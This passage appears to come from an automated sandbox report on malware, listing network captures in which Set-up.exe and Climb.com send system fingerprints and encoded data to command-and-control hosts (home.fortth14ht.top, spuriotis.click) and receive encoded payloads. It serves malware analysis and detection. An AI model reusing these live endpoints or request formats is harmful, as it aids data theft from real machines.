[TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317203404", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
Dec 28, 2024 09:33:28.823878050 CET	9888	OUT	Data Raw: 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 48 5c 2f 77 41 41 52 43 41 51 41 42 51 41 44 41 53 49 41 41 68 Data Ascii: QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQH\/wAARCAQABQADASIAAhEBAxEB\/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL\/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFR
Dec 28, 2024 09:33:28.823925972 CET	2472	OUT	Data Raw: 65 33 38 48 32 65 75 36 46 72 56 74 34 30 38 48 57 66 78 4b 69 74 76 44 50 68 50 56 76 42 76 68 37 77 32 75 75 65 4a 5c 2f 46 6d 68 5c 2f 38 49 31 6f 32 6b 36 35 34 35 2b 49 6d 72 4e 70 39 67 66 44 4a 75 62 61 34 76 76 45 31 7a 4d 49 72 35 62 4d Data Ascii: e38H2eu6FrVt408HWfxKitvDPhPVvBvh7w2uueJ\/Fmh\/8I1o2k6545+ImrNp9gfDJuba4vvE1zMIr5bMRqlmks36+3H7a3hCHwH8H9cf\/AIKj+VF4u8Cazrtr4s\/4Yl1OT\/hY0Nn8Wfid4VbxX\/YI8KlvCH9mXPhq4+H39hSRWz3n\/CDf8JYIWj8TJcT\/ABX\/AMFuQT+1X8PsD\/m3zwr\/AOrH+K9f1r9EDNsTDx6
Dec 28, 2024 09:33:28.823951006 CET	2472	OUT	Data Raw: 66 6e 5c 2f 41 44 5c 2f 6e 33 70 2b 35 34 6f 39 5c 2f 6e 62 50 4c 6c 38 72 76 35 38 33 61 74 44 59 68 35 5c 2f 63 70 47 6b 6a 37 5c 2f 58 6a 39 50 5c 2f 72 31 57 33 65 57 66 2b 65 33 6c 38 5c 2f 39 4d 4f 5c 2f 35 5c 2f 6c 2b 75 4b 6d 2b 54 79 33 Data Ascii: fn\/AD\/n3p+54o9\/nbPLl8rv583atDYh5\/cpGkj7\/Xj9P\/r1W3eWf+e3l8\/9MO\/5\/l+uKm+Ty3Xf6+bH5Xk\/l\/n8KPnbfD0\/e\/8APLr+v06VPv8A938QIW\/vr5f\/AD18uSb\/AFX\/AE6\/59fSjy\/3cyfvESeL93j8v\/1\/\/rqbb5il9m+GT\/Ven\/gJ79PX0qruTb\/Bsj\/e+X\/n\/wCt9PXl9n5\
Dec 28, 2024 09:33:28.823965073 CET	2472	OUT	Data Raw: 71 34 48 4e 4d 71 6a 6e 58 44 5c 2f 46 32 58 63 4d 5a 7a 6a 4d 42 55 6f 59 79 48 74 4d 54 6b 57 5a 59 6d 68 55 6a 67 73 77 6f 34 6a 44 55 63 4c 69 36 2b 46 77 4e 50 43 34 72 6e 6c 58 6c 39 55 71 30 70 53 6f 61 55 5a 48 2b 6e 76 30 50 2b 41 61 5c Data Ascii: q4HNMqjnXD\/F2XcMZzjMBUoYyHtMTkWZYmhUjgswo4jDUcLi6+FwNPC4rnlXl9Uq0pSoaUZH+nv0P+Aa\/if4bvHZRmscj4o4Mzbi7IMDmsK+CqVMLg+IcswOMpVMZltehiq+KwlHGZhWxGEcaeHg8VRxFOOITdaJ+an7FPxM+JvxG8F\/GEeJdH0jTvhzoF6th8OBo+i6R4fs9MWZNWvtX8Ox2OkWNnBcNY21zot3czsMwXN8
Dec 28, 2024 09:33:28.824069977 CET	4944	OUT	Data Raw: 53 76 5c 2f 44 4c 50 6a 65 7a 5c 2f 41 47 30 5c 2f 45 2b 73 61 72 38 51 66 2b 46 4e 2b 43 5c 2f 6a 66 5c 2f 62 48 68 57 33 2b 42 76 77 77 73 72 37 77 62 5c 2f 77 41 49 70 34 37 76 74 50 30 6a 54 5c 2f 37 51 31 66 55 4e 44 31 76 5c 2f 41 49 53 47 Data Ascii: Sv\/DLPjez\/AG0\/E+sar8Qf+FN+C\/jf\/bHhW3+Bvwwsr7wb\/wAIp47vtP0jT\/7Q1fUND1v\/AISG2mbUrT\/hHv7Nhia21a8dP0u\/4csf8Ezv+jav\/Mx\/H7\/56lfa37Pf7NPwR\/ZV8C3Xw1+AfgW3+H\/gu98Rah4svdIh1vxL4hkvPEWqWemadfard6t4t1rXtaubiWw0bSrJVm1F4YLWwtoLeKKOMLX8JYLKsZ
Dec 28, 2024 09:33:28.943166971 CET	2472	OUT	Data Raw: 48 6b 59 4e 65 64 6a 78 4a 34 65 49 5a 68 72 32 69 6b 49 57 44 6b 61 70 59 34 51 72 79 77 59 2b 66 68 53 6f 35 59 48 47 4f 39 50 69 38 51 61 46 4f 72 76 42 72 57 6b 54 4a 48 5c 2f 72 48 69 31 4b 7a 6b 56 4f 4d 5c 2f 4f 79 54 45 4c 77 43 66 6d 49 Data Ascii: HkYNedjxJ4eIZhr2ikIWDkapY4QrywY+fhSo5YHGO9Pi8QaFOrvBrWkTJH\/rHi1KzkVOM\/OyTELwCfmI456V7+YYbJM5wlXLs1w+V5rgcRG1bA5hSwmOwlePVVcNiY1aNWNntOElr5niZXjOIsgxtHNckxWdZLmOFkpYfMsrrY7Lsbh5tqzo4zCSo16Mm+WzhUi27W6H2t4Z\/bT+LWiadPpWrXMfiSwntZLVkvZBHNh0KB\/
Dec 28, 2024 09:33:28.943438053 CET	2472	OUT	Data Raw: 66 44 74 6e 38 43 5c 2f 68 68 72 48 78 62 38 55 79 36 35 61 66 45 50 34 48 2b 41 39 59 75 62 54 57 76 43 32 67 36 74 42 34 50 31 7a 77 76 70 6e 69 54 77 74 72 57 74 57 56 78 59 54 61 5c 2f 70 38 45 45 39 37 46 7a 76 67 6a 58 45 2b 49 50 68 5c 2f Data Ascii: fDtn8C\/hhrHxb8Uy65afEP4H+A9YubTWvC2g6tB4P1zwvpniTwtrWtWVxYTa\/p8EE97FzvgjXE+IPh\/wD4i0HU\/B9rpvxF8RftCeGdEGueIdWsruK9\/Zo+BFt+0V8Rp7uGw8K6tCLJ\/h\/cxw6C8F1PPd6+Gs9St9I0zGrnkyTJfoq8IYPMsbGPDccPh8XguJ5YriXDY3E5hklKs54XLqmBx2cYBZ1hsrnXyHE18HGpia
Dec 28, 2024 09:33:28.943572998 CET	2472	OUT	Data Raw: 47 57 31 46 5a 53 49 6a 4c 58 39 65 35 48 6e 6d 56 38 53 5a 58 68 4d 36 79 58 46 66 58 63 72 78 39 4e 56 73 48 69 31 51 78 47 48 6a 69 4b 4c 66 75 56 61 64 50 46 55 61 46 62 32 56 52 57 6e 53 71 4f 6d 6f 56 71 63 6f 56 61 54 6e 54 6e 47 62 5c 2f Data Ascii: GW1FZSIjLX9e5HnmV8SZXhM6yXFfXcrx9NVsHi1QxGHjiKLfuVadPFUaFb2VRWnSqOmoVqcoVaTnTnGb\/AIe4h4bzrhDOsw4d4iwX9nZzldb2GPwLxGExU8JiErzoVauCr4nDqvRb9niKKqurh60amHrxp1qdSnEqJ+v4f1NS1HJ2\/H+leseMR0U7Y3p\/L\/Gm0AV6KsVXoOgKKKKAIv7\/ANf6mmVKvVvr\/U01lxyOn8qD
Dec 28, 2024 09:33:28.943634033 CET	2472	OUT	Data Raw: 51 78 37 47 6a 65 48 37 5c 2f 5c 2f 41 44 79 2b 30 66 35 39 4f 33 70 37 30 64 33 50 6d 62 76 2b 6d 6e 2b 52 5c 2f 6a 6a 39 4b 6d 6b 33 72 48 38 36 62 5c 2f 38 41 6e 6c 48 37 6a 50 62 5c 2f 41 44 39 61 5a 38 5c 2f 6c 7a 62 4a 50 6b 7a 62 5c 2f 41 Data Ascii: Qx7GjeH7\/\/ADy+0f59O3p70d3Pmbv+mn+R\/jj9Kmk3rH86b\/8AnlH7jPb\/AD9aZ8\/lzbJPkzb\/APXeHt+H9aDQhkjRtjuPKTyvK6fv4rj\/AJ++v+Huah8wxxo+zjyv9X+Z\/P8Az04q00f3PnjT915Xf1\/4+v8Ar99c+nFJJs8ze3yJ\/wA84\/8AP6fWg6KdTfT+u6\/rtqU\/+WiIryP2\/wCmH8+MUNH99An\/A
Dec 28, 2024 09:33:28.943681002 CET	2472	OUT	Data Raw: 73 36 77 32 56 35 64 67 71 32 49 77 4f 64 5a 33 58 79 72 41 34 48 49 38 4a 6d 6d 45 78 4f 4a 72 34 53 57 42 79 33 46 35 56 6c 65 59 71 74 58 6f 56 36 39 44 45 59 53 63 73 75 71 59 42 34 69 58 4c 78 33 67 76 34 35 36 72 61 58 6e 37 46 48 69 6e 55 Data Ascii: s6w2V5dgq2IwOdZ3XyrA4HI8JmmExOJr4SWBy3F5VleYqtXoV69DEYScsuqYB4iXLx3gv456raXn7FHinUf2p38C\/s8fBPx1+wdrfxO\/Yol0P9oa01j4f+NPgh4r8Hy\/tBfF270Twn8NdZ+B3xaPjjxb4f8XfHS18c2\/jq\/8Ai9r0Hjm30HVPCVv4i0NdLW18Bv2lZ739jfw78BvhTr\/wF+HSRaX+09oPxy+GXxosv2+N
Dec 28, 2024 09:33:36.173595905 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sat, 28 Dec 2024 08:33:35 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	194.87.58.92	80	7744	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 09:33:36.451956987 CET	99	OUT	GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1 Host: home.fortth14ht.top Accept: /
Dec 28, 2024 09:33:38.914484024 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Sat, 28 Dec 2024 08:33:38 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	194.87.58.92	80	7744	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 09:33:39.183497906 CET	172	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 28, 2024 09:33:40.774625063 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Sat, 28 Dec 2024 08:33:40 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	3.218.7.103	443	7744	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:33:16 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-28 08:33:16 UTC	224	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:33:16 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-28 08:33:16 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	172.67.128.184	443	8000	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:33:36 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: spuriotis.click
2024-12-28 08:33:36 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-28 08:33:56 UTC	1123	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:33:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=69ru9a305e002hu5gj6mnfv1gu; expires=Wed, 23 Apr 2025 02:20:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J983IRTPenzgVNFrS28%2FFEwDITcRvyFlnpFnBHWqUv5jRSjCbw9bYy4Ebhy2SPqyHdK1hiFA1l6hRYQla02nyDuiRUYRArCdyuQimcXEu9E7iYkt8JmlO%2BIIP1AIGeFfZOU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9034dcbb648ce3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1814&min_rtt=1809&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=906&delivery_rate=1576673&cwnd=252&unsent_bytes=0&cid=ae8cf63127118a87&ts=20267&x=0"
2024-12-28 08:33:56 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-28 08:33:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	172.67.128.184	443	8000	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:33:58 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: spuriotis.click
2024-12-28 08:33:58 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=5FwhVM--lll&j=
2024-12-28 08:33:58 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:33:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o7ot1lm0vsjcvhsuarl54q8to0; expires=Wed, 23 Apr 2025 02:20:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gr%2FcvG%2B8kqReJe%2FKF2%2FAKbb7IZC%2FCdxKROackN0f0QRonYmiYJaiqbHjyxd%2FTOTBd2aKlMPARrkr0mHBGYZ5OnHO98PppEUXcgeXUJFR95xpHNZcJNSAi7wNKrzYzEZGpE4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f903563693f8ce3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1791&rtt_var=681&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=944&delivery_rate=1597374&cwnd=252&unsent_bytes=0&cid=1db98a43771f307f&ts=776&x=0"
2024-12-28 08:33:58 UTC	240	IN	Data Raw: 33 35 33 64 0d 0a 49 46 63 34 4a 6e 47 78 45 45 59 36 36 73 78 39 46 65 65 62 67 59 6d 50 37 52 68 52 68 57 48 33 62 41 42 5a 57 68 73 68 37 41 39 62 64 55 34 45 53 34 55 38 5a 45 6d 50 37 6b 64 68 6c 65 37 6b 70 61 32 4d 66 48 4f 2f 42 35 59 41 63 7a 78 32 4f 56 65 42 4c 52 6f 78 57 55 6f 43 31 44 78 6b 58 35 4c 75 52 30 36 63 75 65 54 6e 72 64 63 36 4e 4f 38 44 6c 67 42 69 4f 44 46 30 55 59 42 73 53 44 74 66 54 68 54 53 64 43 64 57 68 36 6b 59 63 49 62 78 37 2b 44 69 68 58 56 7a 71 55 4f 53 46 69 4a 6a 65 46 5a 45 6d 47 35 74 4e 6b 74 4e 55 38 77 38 50 52 69 50 6f 6c 38 76 78 66 72 6b 36 2b 4f 4c 66 44 72 74 43 5a 38 49 59 7a 30 77 61 30 69 4b 5a 30 67 31 58 45 38 65 32 32 41 71 58 49 43 69 48 6e 71 47 75 61 Data Ascii: 353dIFc4JnGxEEY66sx9FeebgYmP7RhRhWH3bABZWhsh7A9bdU4ES4U8ZEmP7kdhle7kpa2MfHO/B5YAczx2OVeBLRoxWUoC1DxkX5LuR06cueTnrdc6NO8DlgBiODF0UYBsSDtfThTSdCdWh6kYcIbx7+DihXVzqUOSFiJjeFZEmG5tNktNU8w8PRiPol8vxfrk6+OLfDrtCZ8IYz0wa0iKZ0g1XE8e22AqXICiHnqGua
2024-12-28 08:33:58 UTC	1369	IN	Data Raw: 32 72 36 70 63 36 61 36 64 51 70 77 31 7a 4b 69 31 30 55 34 67 74 58 58 74 44 42 42 54 66 4d 6e 77 59 67 4b 49 52 63 6f 62 32 35 4f 72 74 6e 58 55 7a 35 41 75 64 43 6d 67 30 4e 33 5a 4e 68 47 70 4b 50 46 31 4c 46 4e 74 30 4b 31 76 49 34 46 39 77 6e 62 6d 37 71 38 32 66 65 54 44 7a 44 6f 52 4f 66 58 55 68 4f 55 53 43 4c 52 70 31 58 45 6f 53 33 6e 49 32 55 49 4f 6c 47 6d 57 4f 38 4f 37 6d 37 59 4a 77 50 4f 51 44 6b 67 52 6f 4e 44 4a 39 54 6f 4e 72 51 6a 55 61 43 6c 50 55 61 6d 51 41 79 49 30 61 5a 34 4c 31 39 61 6e 58 7a 32 56 39 2f 6b 4f 53 41 69 4a 6a 65 48 46 47 6a 57 35 4a 4f 6c 6c 4d 47 4d 46 79 4e 6c 36 46 71 77 31 78 67 50 66 70 36 50 2b 46 64 44 58 6b 43 70 34 48 5a 7a 77 38 4f 51 33 4f 61 6c 70 31 41 67 51 79 33 6e 6b 6f 55 70 2b 75 58 32 6a 4c 34 Data Ascii: 2r6pc6a6dQpw1zKi10U4gtXXtDBBTfMnwYgKIRcob25OrtnXUz5AudCmg0N3ZNhGpKPF1LFNt0K1vI4F9wnbm7q82feTDzDoROfXUhOUSCLRp1XEoS3nI2UIOlGmWO8O7m7YJwPOQDkgRoNDJ9ToNrQjUaClPUamQAyI0aZ4L19anXz2V9/kOSAiJjeHFGjW5JOllMGMFyNl6Fqw1xgPfp6P+FdDXkCp4HZzw8OQ3Oalp1AgQy3nkoUp+uX2jL4
2024-12-28 08:33:58 UTC	1369	IN	Data Raw: 44 63 44 58 6f 44 70 6c 4f 4c 48 73 2f 59 51 50 57 4c 57 67 32 54 6b 63 5a 6b 55 63 6e 56 6f 61 70 43 54 65 61 74 2f 71 72 36 6f 4d 36 61 36 63 4f 6c 41 5a 6b 4b 54 64 30 51 49 42 6a 54 54 42 56 54 42 50 54 66 79 46 63 67 36 55 63 65 6f 48 72 36 65 76 6c 69 6e 73 35 37 55 50 62 54 6d 55 6a 65 43 45 44 76 33 70 4a 64 32 39 48 48 64 31 31 4d 68 69 58 34 41 59 33 67 76 57 6a 73 36 32 43 63 6a 62 69 44 4a 51 45 62 44 34 79 64 55 75 41 62 6c 41 36 58 6b 51 66 32 33 67 70 56 6f 79 6d 46 6e 79 4f 2f 2b 50 71 35 38 38 30 63 2b 41 62 31 56 59 69 44 7a 39 31 54 6f 45 76 64 7a 5a 55 53 68 54 46 4d 6a 73 57 6b 65 34 59 65 38 57 68 6f 2b 66 6b 6a 33 45 35 34 77 4f 53 41 32 63 34 50 33 70 4f 69 57 64 4d 4d 6c 35 49 47 74 35 30 4a 46 2b 4d 71 77 31 79 6a 50 58 76 71 36 Data Ascii: DcDXoDplOLHs/YQPWLWg2TkcZkUcnVoapCTeat/qr6oM6a6cOlAZkKTd0QIBjTTBVTBPTfyFcg6UceoHr6evlins57UPbTmUjeCEDv3pJd29HHd11MhiX4AY3gvWjs62CcjbiDJQEbD4ydUuAblA6XkQf23gpVoymFnyO/+Pq5880c+Ab1VYiDz91ToEvdzZUShTFMjsWke4Ye8Who+fkj3E54wOSA2c4P3pOiWdMMl5IGt50JF+Mqw1yjPXvq6
2024-12-28 08:33:58 UTC	1369	IN	Data Raw: 2b 45 32 4d 54 6d 55 33 65 43 45 44 68 32 52 51 4f 31 52 4e 48 74 56 36 49 31 61 46 70 52 6c 38 67 76 37 6c 35 75 57 43 66 7a 44 6d 42 35 38 63 59 54 41 79 64 45 6e 4f 49 77 49 79 51 67 52 4c 6b 31 55 6f 63 5a 69 31 44 57 48 46 35 71 33 79 72 59 68 32 63 37 39 44 6c 67 46 72 4e 44 42 78 54 49 46 70 54 44 4e 63 53 52 62 63 65 44 5a 51 68 71 4d 55 65 49 37 72 34 2b 62 70 67 33 34 37 37 41 6e 56 51 43 49 38 49 44 6b 62 7a 6c 68 50 4f 6c 70 48 42 5a 4e 74 61 6b 48 49 71 52 4d 33 33 62 6e 76 35 65 32 41 64 6a 2f 73 43 35 51 43 62 44 77 39 63 45 75 47 66 30 4d 78 55 6b 55 64 33 48 4d 67 58 59 32 71 47 48 4f 44 39 71 4f 6c 72 59 68 69 63 37 39 44 75 69 6c 58 65 52 6c 44 41 35 45 6a 57 33 56 64 53 46 4f 4c 4d 69 68 62 68 4b 59 51 63 59 7a 31 36 65 4c 6d 67 33 45 Data Ascii: +E2MTmU3eCEDh2RQO1RNHtV6I1aFpRl8gv7l5uWCfzDmB58cYTAydEnOIwIyQgRLk1UocZi1DWHF5q3yrYh2c79DlgFrNDBxTIFpTDNcSRbceDZQhqMUeI7r4+bpg3477AnVQCI8IDkbzlhPOlpHBZNtakHIqRM33bnv5e2Adj/sC5QCbDw9cEuGf0MxUkUd3HMgXY2qGHOD9qOlrYhic79DuilXeRlDA5EjW3VdSFOLMihbhKYQcYz16eLmg3E
2024-12-28 08:33:58 UTC	1369	IN	Data Raw: 51 74 74 4f 6a 6c 2f 55 59 6c 6b 55 44 74 58 53 78 76 62 65 79 56 63 6a 61 4d 5a 65 34 2f 34 35 4f 58 6a 68 7a 70 39 70 77 53 4e 54 6a 70 37 47 57 6c 59 6e 48 74 50 46 46 64 4c 55 38 77 38 50 52 69 50 6f 6c 38 76 78 66 44 78 37 2b 43 64 63 7a 54 70 44 4a 59 63 59 7a 59 7a 61 30 53 42 61 55 55 35 58 45 73 56 30 6e 63 75 56 49 2b 72 46 48 69 4a 75 61 32 72 36 70 63 36 61 36 63 74 6e 68 31 31 4f 44 5a 79 56 5a 55 74 58 58 74 44 42 42 54 66 4d 6e 77 59 69 36 55 55 63 34 58 31 34 2b 2f 67 6a 32 67 38 34 41 53 63 42 58 41 78 50 33 35 49 68 6d 5a 4e 4d 30 68 49 48 63 46 33 4e 6b 72 49 34 46 39 77 6e 62 6d 37 71 39 75 49 61 69 50 6b 51 61 51 59 59 53 30 7a 64 45 2f 4f 63 67 77 73 47 6b 4d 66 6b 79 70 6b 58 6f 65 6e 48 48 69 45 38 4f 2f 6d 36 49 5a 2f 4d 75 45 48 Data Ascii: QttOjl/UYlkUDtXSxvbeyVcjaMZe4/45OXjhzp9pwSNTjp7GWlYnHtPFFdLU8w8PRiPol8vxfDx7+CdczTpDJYcYzYza0SBaUU5XEsV0ncuVI+rFHiJua2r6pc6a6ctnh11ODZyVZUtXXtDBBTfMnwYi6UUc4X14+/gj2g84AScBXAxP35IhmZNM0hIHcF3NkrI4F9wnbm7q9uIaiPkQaQYYS0zdE/OcgwsGkMfkypkXoenHHiE8O/m6IZ/MuEH
2024-12-28 08:33:58 UTC	1369	IN	Data Raw: 67 6a 4f 56 7a 41 64 41 49 79 56 67 52 4c 6b 33 45 6a 57 34 6d 6b 46 6e 75 4b 2f 75 66 35 35 34 68 6f 4d 75 59 49 6d 41 4a 69 4e 6a 56 7a 51 6f 64 67 54 6a 68 64 51 78 7a 57 4d 6d 6f 59 6a 37 5a 66 4c 38 58 59 37 75 44 68 31 43 42 7a 2b 45 32 4d 54 6d 55 33 65 43 45 44 6a 6d 64 48 50 31 64 48 48 4e 42 67 4a 56 36 61 72 68 4a 39 6c 2f 50 6f 37 75 43 43 64 7a 44 68 42 5a 34 43 63 44 49 34 65 6b 6a 4f 49 77 49 79 51 67 52 4c 6b 31 45 7a 54 6f 4b 70 45 32 47 4f 2b 4f 44 39 34 4a 38 36 66 61 63 53 6b 68 38 69 59 79 35 70 56 49 6c 79 44 43 77 61 51 78 2b 54 4b 6d 52 65 67 61 67 59 63 59 76 72 35 75 33 69 67 48 4d 36 34 77 75 57 44 6d 59 2f 50 33 78 41 67 6d 5a 46 4e 6c 56 41 47 74 31 37 4b 78 6a 47 37 68 68 76 78 61 47 6a 79 76 61 4d 64 6a 36 6e 48 4e 73 58 49 Data Ascii: 